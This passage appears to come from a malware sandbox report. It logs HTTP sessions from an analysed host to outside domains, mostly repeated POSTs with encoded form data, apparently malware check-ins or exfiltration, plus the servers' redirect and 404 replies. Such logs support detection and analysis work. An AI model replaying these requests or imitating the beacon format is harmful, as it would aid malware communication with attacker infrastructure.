                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 6f 47 66 55 74 69 5a 30 75 75 37 47 5a 4f 65 57 71 41 72 6b 77 6d 31 6e 50 64 59 53 4a 68 4e 75 54 71 56 67 6b 74 46 42 35 70 4e 67 56 5a 5a 79 61 32 66 4b 6a 57 76 2f 2f 59 42 43 73 61 53 65 44 4b 38 6c 6c 67 2b 6c 38 2f 38 51 66 59 34 6d 79 75 39 36 4b 68 61 58 78 65 33 59 55 79 38 38 52 70 59 72 67 4e 4f 33 33 31 6b 61 7a 77 4a 48 50 6c 49 36 59 41 4f 6a 70 71 37 6b 57 6f 66 76 45 33 77 66 53 73 59 66 50 45 70 48 64 55 76 54 65 41 79 59 44 68 45 5a 78 52 68 66 45 71 4e 34 46 68 6a 72 57 30 61 4e 33 5a 78 35 42 33 46 77 66 59 72 75 55 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5oGfUtiZ0uu7GZOeWqArkwm1nPdYSJhNuTqVgktFB5pNgVZZya2fKjWv//YBCsaSeDK8llg+l8/8QfY4myu96KhaXxe3YUy88RpYrgNO331kazwJHPlI6YAOjpq7kWofvE3wfSsYfPEpHdUvTeAyYDhEZxRhfEqN4FhjrW0aN3Zx5B3FwfYruUw==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        71192.168.11.20498633.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:58.800868034 CEST831OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 70 6d 76 55 72 42 68 30 6e 75 37 42 57 75 65 57 7a 51 72 2f 77 6d 35 6e 50 63 4e 66 4a 7a 5a 75 54 4c 46 67 69 63 46 42 38 70 4e 67 4e 70 5a 4e 48 47 66 37 6a 58 54 5a 2f 59 74 43 73 61 57 65 44 50 41 6c 6c 52 2b 69 39 76 38 53 54 34 34 34 38 4f 39 36 4b 68 61 58 78 65 53 44 55 79 30 38 52 35 6f 72 69 6f 79 30 70 6c 6b 5a 6a 67 4a 48 5a 6c 4a 39 59 41 4f 42 70 72 6e 4f 57 75 54 76 45 31 6f 66 53 35 6b 59 56 55 70 46 58 30 75 64 51 56 53 55 62 7a 30 30 77 53 56 66 4c 36 52 77 4a 58 75 78 4c 47 75 70 30 4b 74 4c 46 48 38 59 64 61 71 31 4a 36 75 4c 6d 70 48 6c 6f 52 4f 74 6a 64 42 71 59 46 4f 4c 75 45 59 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzZuTLFgicFB8pNgNpZNHGf7jXTZ/YtCsaWeDPAllR+i9v8ST4448O96KhaXxeSDUy08R5orioy0plkZjgJHZlJ9YAOBprnOWuTvE1ofS5kYVUpFX0udQVSUbz00wSVfL6RwJXuxLGup0KtLFH8Ydaq1J6uLmpHloROtjdBqYFOLuEY=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        72192.168.11.20498643.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:01.439574003 CEST2578OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 70 6d 76 55 72 42 68 30 6e 75 37 42 57 75 65 57 7a 51 72 2f 77 6d 35 6e 50 63 4e 66 4a 7a 42 75 54 37 5a 67 68 2f 64 42 2f 70 4e 67 45 4a 5a 4d 48 47 66 63 6a 57 37 64 2f 59 78 6f 73 59 65 65 44 71 4d 6c 74 44 61 69 30 76 38 53 62 59 34 6c 79 75 38 6e 4b 68 4b 74 78 65 69 44 55 79 30 38 52 2f 45 72 73 74 4f 30 72 6c 6b 61 7a 77 4a 78 50 6c 4a 5a 59 41 57 37 70 6f 4b 35 57 65 7a 76 44 56 34 66 52 4c 4d 59 4e 45 70 39 55 30 76 41 51 56 58 4b 62 7a 6f 34 77 54 78 78 4c 36 70 77 4a 52 54 55 51 48 43 66 76 61 4a 46 46 6b 45 52 61 36 2b 30 4f 35 69 31 67 5a 44 62 75 58 65 57 68 2f 46 34 43 33 43 58 77 44 74 49 59 54 52 64 54 73 63 49 74 6e 77 46 6f 51 35 65 59 54 74 2f 2b 6a 48 4a 4f 35 35 5a 48 54 4b 46 58 6e 64 64 65 64 65 57 49 72 54 34 37 42 2f 53 6a 30 64 62 53 51 66 53 6f 73 73 57 57 61 67 72 6c 47 50 30 31 36 66 59 37 6d 51 73 6b 49 59 79 5a 67 41 76 53 34 78 63 30 30 36 50 4d 38 69 53 30 37 58 61 2f 36 52 42 57 71 50 30 6c 73 4c 39 49 50 38 62 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzBuT7Zgh/dB/pNgEJZMHGfcjW7d/YxosYeeDqMltDai0v8SbY4lyu8nKhKtxeiDUy08R/ErstO0rlkazwJxPlJZYAW7poK5WezvDV4fRLMYNEp9U0vAQVXKbzo4wTxxL6pwJRTUQHCfvaJFFkERa6+0O5i1gZDbuXeWh/F4C3CXwDtIYTRdTscItnwFoQ5eYTt/+jHJO55ZHTKFXnddedeWIrT47B/Sj0dbSQfSossWWagrlGP016fY7mQskIYyZgAvS4xc006PM8iS07Xa/6RBWqP0lsL9IP8bocx+13YANu2NTtovZeueVJNzqiDbgMuxdI0VWbn63GaPVcUaT7IuL5Rb9dygAHZ9pIm869aIkjG4yim5meXPohz6M6TTK506uMUtDgb4RvN9HE+LDKT/u5WxR09w4JM5EbNmkoB2NRrhR+Cvi0XsUFAF0LLuRzmhW2iOynDB8NPVTZBt6mBeW3KpgGYUEQRPaqeVNNQoaPB4X6/ed0356vXGKVwDzlbZjUAaerFX8Eyg+w7c5pUdtrDfRZrBifTrgzGK+8xCW3T/H3OIm81lyB56rQuaLIOzBUqSrsfITAfyi/UkdQsBD2eeZYU9dLphfaNSH46qT9+OzZy91P/fnvPI7FpOglsdC3ll4LNWihS7Kih8OldyeP71Uu87UzzMMyBCJz8o3UVNE2G66wyQVeiISgwswGsA4aH/l2TJqIrA6sagI1PdP0NeelGBky8HmFXW4jnAJxo37d5ujyzPcx35wNjAv2ds5BfWRKg7CWhuZu2Wqd/A9O+6HUm5ktzCI61RGvSixORUn9s6HU6JnkUCNqXDecL8rZjXhASSQNgH7z8dlgy8Wx5KHvXepRDQI0q5AA31BheOenJ9W6eRMYpDwgWITDOKFURH3vsaWWFl1cFW40fJQXf3eYOb1PmqZtH6L4tOmh9Xt49iQFEBmLvogu8HsivAjq [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:58:01.439630032 CEST5402OUTData Raw: 30 33 78 39 6a 50 73 63 52 65 4f 50 47 36 34 6e 74 79 57 52 53 73 79 59 4d 47 45 31 36 6e 58 37 4d 4c 4f 71 39 50 47 76 68 65 4c 49 42 52 43 45 44 41 66 56 70 51 69 6e 6f 37 54 46 44 74 71 73 66 69 65 4b 74 36 4e 42 31 32 62 63 33 59 43 68 7a 77
                                                                                                                                                                                                                        Data Ascii: 03x9jPscReOPG64ntyWRSsyYMGE16nX7MLOq9PGvheLIBRCEDAfVpQino7TFDtqsfieKt6NB12bc3YChzwPSGR8t+xyMrIkiteBw9a/WN9OIgecF5wFeeeZN+MthHv4yxpU/NvUgYqtr7d6qWwemyGg1UK2YiV0NPBWQFhPWSwu4R2gnfJVM7Co6TYenr+E94Y3qtVDCF7rjKcKRiMn1okxY+ZwxdV8FdtcsZ1xlSMc2fiiExUb


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        73192.168.11.20498653.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:05.089692116 CEST536OUTGET /2x6z/?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:58:05.192934036 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:05 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 36 73 55 65 41 45 74 37 68 77 59 34 6d 6b 33 77 70 6b 31 50 79 2b 4b 64 64 71 54 58 79 41 32 7a 38 31 68 48 42 62 4d 44 57 68 78 68 62 34 70 50 32 50 30 47 78 2f 45 79 49 35 46 4f 43 45 58 4a 67 6c 62 48 7a 70 74 63 74 62 36 6d 47 35 6b 52 6b 6a 47 4f 79 5a 30 72 43 4b 42 6c 38 4f 42 6e 64 6a 75 69 79 38 72 56 47 45 51 72 57 6f 67 79 76 4f 65 31 77 6c 49 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=6sUeAEt7hwY4mk3wpk1Py+KddqTXyA2z81hHBbMDWhxhb4pP2P0Gx/EyI5FOCEXJglbHzptctb6mG5kRkjGOyZ0rCKBl8OBndjuiy8rVGEQrWogyvOe1wlI=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        74192.168.11.2049866162.241.63.7780
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:10.325833082 CEST817OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6b 6c 39 5a 71 49 7a 6b 35 55 49 59 4b 49 53 68 5a 75 7a 7a 65 52 6f 79 64 55 67 53 31 53 4b 45 78 2b 46 52 6b 52 70 77 67 50 39 46 43 58 72 75 68 49 4e 47 46 32 6b 4f 66 65 75 44 73 38 6f 63 52 64 2b 47 51 56 75 41 51 5a 4b 6a 75 2f 52 63 49 58 65 41 54 6e 49 68 39 64 52 6e 34 4a 51 47 61 32 75 75 77 59 30 6d 44 6b 52 42 70 6a 44 6a 2b 66 72 37 49 54 78 45 44 46 35 6f 47 65 50 65 41 52 77 57 44 75 32 4d 53 30 38 58 77 37 73 39 6b 5a 71 58 41 58 5a 56 73 75 42 6d 36 6c 2f 6f 52 36 77 44 65 77 4d 6d 53 6e 48 6a 65 6a 6b 43 77 74 59 5a 39 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1Skkl9ZqIzk5UIYKIShZuzzeRoydUgS1SKEx+FRkRpwgP9FCXruhINGF2kOfeuDs8ocRd+GQVuAQZKju/RcIXeATnIh9dRn4JQGa2uuwY0mDkRBpjDj+fr7ITxEDF5oGePeARwWDu2MS08Xw7s9kZqXAXZVsuBm6l/oR6wDewMmSnHjejkCwtYZ9w==
                                                                                                                                                                                                                        Oct 23, 2024 18:58:10.525369883 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:10 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:58:10.525419950 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        75192.168.11.2049867162.241.63.7780
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:12.981201887 CEST837OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6d 45 4e 5a 6f 72 72 6b 75 45 49 62 41 6f 53 68 58 4f 7a 33 65 52 6b 79 64 56 55 38 31 68 69 45 78 61 4a 52 6a 51 70 77 68 50 39 46 61 6e 71 6b 75 6f 4e 64 46 32 70 7a 66 61 75 44 73 38 38 63 52 66 32 47 58 6d 47 44 66 70 4b 62 31 76 52 53 47 33 65 41 54 6e 49 68 39 63 78 42 34 4a 49 47 47 58 65 75 2f 5a 30 6c 4f 45 52 65 68 44 44 6a 73 76 72 33 49 54 77 2b 44 47 39 4f 47 59 4c 65 41 51 41 57 41 38 65 50 59 30 38 52 30 37 74 68 6c 34 50 42 41 55 74 5a 6c 35 6b 2f 39 33 6a 53 55 73 39 5a 44 43 34 43 52 30 62 52 61 54 64 71 79 76 5a 43 67 37 43 52 51 71 6e 49 5a 78 65 78 71 58 64 31 4f 48 47 32 51 66 41 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=hu/uoW/gq1SkmENZorrkuEIbAoShXOz3eRkydVU81hiExaJRjQpwhP9FanqkuoNdF2pzfauDs88cRf2GXmGDfpKb1vRSG3eATnIh9cxB4JIGGXeu/Z0lOERehDDjsvr3ITw+DG9OGYLeAQAWA8ePY08R07thl4PBAUtZl5k/93jSUs9ZDC4CR0bRaTdqyvZCg7CRQqnIZxexqXd1OHG2QfA=
                                                                                                                                                                                                                        Oct 23, 2024 18:58:13.195924997 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:13 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        Content-Length: 1168
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:58:13.196001053 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        76192.168.11.2049868162.241.63.7780
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.637100935 CEST1289OUTPOST /65n9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.estrela-b.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.estrela-b.online/65n9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 68 75 2f 75 6f 57 2f 67 71 31 53 6b 6d 45 4e 5a 6f 72 72 6b 75 45 49 62 41 6f 53 68 58 4f 7a 33 65 52 6b 79 64 56 55 38 31 6e 36 45 77 70 42 52 6c 7a 52 77 69 50 39 46 58 48 71 6e 75 6f 4d 50 46 32 78 2f 66 61 72 30 73 2f 45 63 51 36 36 47 53 58 47 44 45 35 4b 62 71 2f 52 66 49 58 66 41 54 6e 59 74 39 64 64 42 34 4a 49 47 47 55 32 75 34 49 30 6c 49 45 52 42 70 6a 44 2f 2b 66 71 6f 49 58 63 45 44 48 4a 34 47 6f 72 65 41 77 51 57 51 5a 71 50 55 30 38 54 7a 37 74 70 6c 34 79 66 41 55 67 67 6c 35 35 55 39 30 44 53 59 70 63 34 54 69 78 56 48 45 44 36 47 44 42 48 77 75 39 78 67 4c 4f 61 55 4b 6e 78 66 52 47 54 73 6b 6c 54 64 56 72 38 44 66 79 6b 6b 68 65 79 74 76 52 67 49 33 43 30 72 44 68 38 45 57 76 6d 73 4d 4c 72 39 4e 6e 2b 51 62 4e 55 37 43 78 73 5a 64 52 57 53 6e 46 6a 4c 75 65 42 42 47 4e 4d 6c 6d 4c 67 2f 46 73 58 62 2b 76 70 35 5a 6d 4c 6b 49 2b 78 62 78 43 62 4f 72 57 58 45 44 64 57 6a 51 46 34 32 55 6e 78 6d 31 59 6e 4f 72 70 33 63 2f 53 2f 67 32 2b 75 47 44 31 4c 62 68 52 6d [TRUNCATED]
